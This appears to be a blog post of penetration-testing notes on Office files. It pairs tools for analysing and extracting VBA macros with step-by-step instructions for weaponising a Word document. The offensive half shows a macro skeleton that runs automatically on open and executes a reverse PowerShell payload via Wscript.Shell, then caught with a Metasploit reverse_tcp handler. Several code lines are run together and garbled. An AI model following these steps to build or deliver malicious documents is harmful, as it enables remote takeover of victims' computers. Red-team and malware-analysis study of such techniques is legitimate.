Generic analysis tools
- Unzip the file; if it is not a very old office file, the file is a zip file.
- exiftools:
exiftool doc.doc - Analyse with oleid
oleid doc.doc - To see VBA scripts directly:
olevba /tmp/a.doc - Analyse a document with oletools. See the readme. It has many subcommands to analyse various things.
- With ViperMonkey, macros can be analyzed in a VBA emulator.
- QuickSand is also a analysis framework
Extract macros with oledump
Use oledump.py to extract macros. List the file contents:
python oledump.py $file
Example from an output:
... 7: M 16267 'Macros/VBA/NewMacros' 8: m 932 'Macros/VBA/ThisDocument' ...
To show details from a document part use the first number and execute
python oledump.py -s $no $file
But to extract Macros, ‑v has to been used, because Macros are additionally compressed.
python oledump.py -s $no -v $file
Create macros
- Create a new Word document
- Open the macro dialog (View -> Macros)
- Create a new macro there. You are now in the VB view.
- Make sure to set the dropdown which defined where the macro is stored. Per default, it is stored in a local database and not in the document itself.
- When creating the macro, put it (or a function’s call) into the AutoOpen() and Document_Open() functions.
Sub AutoOpen()
PayloadMacroEndSubDocument_Open()
PayloadMacroEnd Sub
(… see 5.) - Add the payload, e.g. a reverse shell.
- Use make_reverse_powershell.py to create the payload.
- Use split_reverse_powershell.py to split the large command line to conform to the VC string limit. (!) Note that a line may not have more than 50 characters!
- Add it to the macro function:
Sub PayloadMacro()
Dim Str As String
Str = …
Str = Str + …
Str = Str + …
CreateObject("Wscript.Shell").Run StrEnd Sub - Alternative: See Powercat section on the Reverse Shell post.
- Save the file.
- Open meterpreter reverse shell with
set PAYLOAD windows/x64/shell/reverse_tcp
- Wait and €profit.
Another way: See windows/fileformat/word_mshtml_rce
Leave a Reply
You must be logged in to post a comment.